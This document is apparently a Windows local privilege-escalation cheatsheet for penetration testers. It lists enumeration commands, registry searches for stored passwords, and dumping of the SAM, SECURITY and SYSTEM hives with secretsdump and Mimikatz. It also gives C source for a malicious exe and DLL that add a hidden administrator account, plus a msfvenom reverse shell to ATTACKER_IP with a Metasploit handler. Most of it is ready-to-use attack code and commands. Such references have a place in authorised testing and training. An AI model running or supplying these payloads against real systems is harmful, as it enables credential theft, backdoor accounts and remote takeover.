Local Windows Cheatsheet

Global enumeration

PS C:\Users> Get-ChildItem -Path C:\ -Include *.kdbx,SAM,SYSTEM -File -Recurse -ErrorAction SilentlyContinue
PS C:\Users> Get-ChildItem -Path C:\Users -Include *.txt,*.ini,*.conf*,id_*,*.kdbx,*.pdf, -File -Recurse -ErrorAction SilentlyContinue

#Registers
REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K

# Check installed softwares to choose which register to query
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # Windows Autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword" 
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" # SNMP parameters
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # Putty clear text proxy credentials
reg query "HKCU\Software\ORL\WinVNC3\Password" # VNC credentials
reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password

reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

Privileges and groups

Explanatory diagram:

Various commands :

C:\Users> whoami #Gives the username
C:\Users> whoami /priv #Gives the user privileges

C:\Users> net user <username> #Gives user groups  
C:\Users> net user <username> /domain #Gives domain user groups
C:\Users> net localgroup #Gives local groups  

PS C:\Users> Get-LocalGroupMember "Administrators" #Gives members of the Administrators group

Information on the current system

PS C:\Users> systeminfo #Gives system information
PS C:\Users> wmic qfe list #Lists installed updates
PS C:\Users> wmic qfe get Caption,Description,HotFixID,InstalledOn #Lists installed updates with more info

Network infos

PS C:\Users> ipconfig /all #Gives network interfaces infos   

PS C:\Users> netstat -ano #Gives active network connections, with PID/process name 
PS C:\Users> netstat -ano | findstr "LISTENING" #Gives listening ports, waiting for incoming connections  
PS C:\Users> netstat -ano | findstr "ESTABLISHED" #Gives established connections 
PS C:\Users> netstat -ano | findstr "CLOSE_WAIT" #Gives locally closed connections, waiting for remote close
PS C:\Users> netstat -ano | findstr "TIME_WAIT" #Gives closed connections, waiting to ensure no more packets in transit
PS C:\Users> netstat -ano | findstr "SYN_SENT" #Gives connections waiting for remote SYN-ACK
PS C:\Users> netstat -ano | findstr "SYN_RECEIVED" #Gives connections waiting for local SYN-ACK

PS C:\Users> arp -a #Gives ARP entries / Useful for MITM  
PS C:\Users> route print #Gives routing table

Services and apps installed

PS C:\Users> Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname #Lists installed applications    
PS C:\Users> Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | Where-Object {$_.DisplayName -like "*Adobe*"} #Lists applications containing "Adobe"
PS C:\Users> ls "C:\Program Files (x86)\" #Lists programs in "Program Files (x86)" folder  
PS C:\Users> ls "C:\Program Files\" #Lists programs in "Program Files" folder

Infos on running processes

PS C:\Users> Get-Process #Lists running processes     
PS C:\Users> Get-Process | Where-Object {$_.Name -like "*sql*"} #Lists running processes containing "sql"

PS C:\Users> Get-Service | Where-Object {$_.StartName -eq "LocalSystem"} #Lists services running as "LocalSystem" account

PS C:\Users> Get-CimInstance -ClassName win32_service | Select Name,State,PathName,Author | Where-Object {$_.State -like 'Running'} #Lists running services  

PS C:\Users> icacls "C:\xampp\apache\bin\httpd.exe" # Gives current user permissions on file 
PS C:\Users> net stop httpd # Stops httpd service  
PS C:\Users> net start httpd # Starts httpd service  


PS C:\Users> Get-CimInstance -ClassName win32_service | Select Name, StartMode  # Gives services startup mode (notably scheduled startup)  
PS C:\Users> shutdown /r /t 0 # Reboots machine  

C:\Users> wmic service get name,pathname |  findstr /i /v "C:\Windows\\" | findstr /i /v """ # Gives non-Windows services

Planned tasks

PS C:\Users> Get-ScheduledTask | ft Author,TaskPath,TaskName # Gives scheduled tasks for all users  
PS C:\Users> schtasks /query /fo LIST /v | Select-String "TaskName" -Context 0,10 # Gives scheduled tasks  

PS C:\Users> Get-ScheduledTask | Where-Object {$_.TaskPath -like "*Microsoft*"} | ft Author,TaskPath,TaskName # Gives scheduled tasks in "Microsoft" folder  
PS C:\Users> Get-ScheduledTask | Where-Object {$_.TaskPath -like "*Microsoft*"} | Get-ScheduledTaskInfo | ft TaskName,LastRunTime,LastTaskResult # Gives scheduled tasks in "Microsoft" folder with last executions

Hash/Passwords dumps

Via CMD/PS

Hive	Description	Type de hash
HKLM\SAM	Contient les hashs des mots de passe utilisateurs	NTLM and LM (depreciated)
HKLM\SECURITY	Informations de sécurité des utilisateurs (SID, roles, droits...)	-
HKLM\SYSTEM	Informations système (hostname, SID...)	-
NTDS.DIT	Database Active Directory : hashs mots de passe utilisateurs de l'AD	NTLM, Kerberos

C:\> reg save hklm\security c:\SECURITY #Saves "security" registry hive to "SECURITY" file
C:\> reg save hklm\sam c:\SAM #Saves "sam" registry hive to "SAM" file 
C:\> reg save hklm\system c:\SYSTEM #Saves "system" registry hive to "SYSTEM" file  

$ ìmpacket-secretsdump.py -sam SAM -security SECURITY -system SYSTEMLOCAL

Mimikatz

# Powershell Mimikatz
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /patch" "lsadump::sam" "lsadump::cache" "sekurlsa::ekeys" "exit"'

# Executable Mimikatz
privilege::debug 
token::elevate

#Extract from lsass (memory)
sekurlsa::logonpasswords
#Extract from lsass (service)
lsadump::lsa /inject
#Extract from SAM
lsadump::sam

Payloads

Malicious exe

#include <stdlib.h>

int main ()
{
  int i;

  i = system ("net user malicioususer helloWorld /add");
  i = system ("net localgroup administrators malicioususer /add");

  return 0;
}

kali@kali:~$ x86_64-w64-mingw32-gcc adduser.c -o adduser.exe # Compile payload

Malicious dll

DLL load order priority:

List content of the "path" environment variable

PS C:\Users> $env:path

Payload :

#include <stdlib.h>
#include <windows.h>

BOOL APIENTRY DllMain(
HANDLE hModule,// Handle to DLL module
DWORD ul_reason_for_call,// Reason for calling function
LPVOID lpReserved ) // Reserved
{
    switch ( ul_reason_for_call )
    {
        case DLL_PROCESS_ATTACH: // A process is loading the DLL.
        int i;
  	    i = system ("net user malicioususer helloWorld /add");
  	    i = system ("net localgroup administrators malicioususer /add");
        break;
        case DLL_THREAD_ATTACH: // A process is creating a new thread.
        break;
        case DLL_THREAD_DETACH: // A thread exits normally.
        break;
        case DLL_PROCESS_DETACH: // A process unloads the DLL.
        break;
    }
    return TRUE;
}

kali@kali:~$ x86_64-w64-mingw32-gcc myDLL.cpp --shared -o myDLL.dll # Compile payload  
PS C:\Users> Restart-Service <service> # Restart service

Metasploit

$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ATTACKER_IP> LPORT=<PORT> -f exe -o shell.exe  

$ msfconsole  
> use multi/handler
> set LHOST <ATTACKER_IP>
> set LPORT <PORT> 
> set PAYLOAD windows/x64/shell_reverse_tcp  
> run

Global enumeration​

Privileges and groups​

Information on the current system​

Network infos​

Services and apps installed​

Infos on running processes​

Planned tasks​

Hash/Passwords dumps​

Via CMD/PS​

Mimikatz​

Payloads​

Malicious exe​

Malicious dll​

Metasploit​

Global enumeration

Privileges and groups

Information on the current system

Network infos

Services and apps installed

Infos on running processes

Planned tasks

Hash/Passwords dumps

Via CMD/PS

Mimikatz

Payloads

Malicious exe

Malicious dll

Metasploit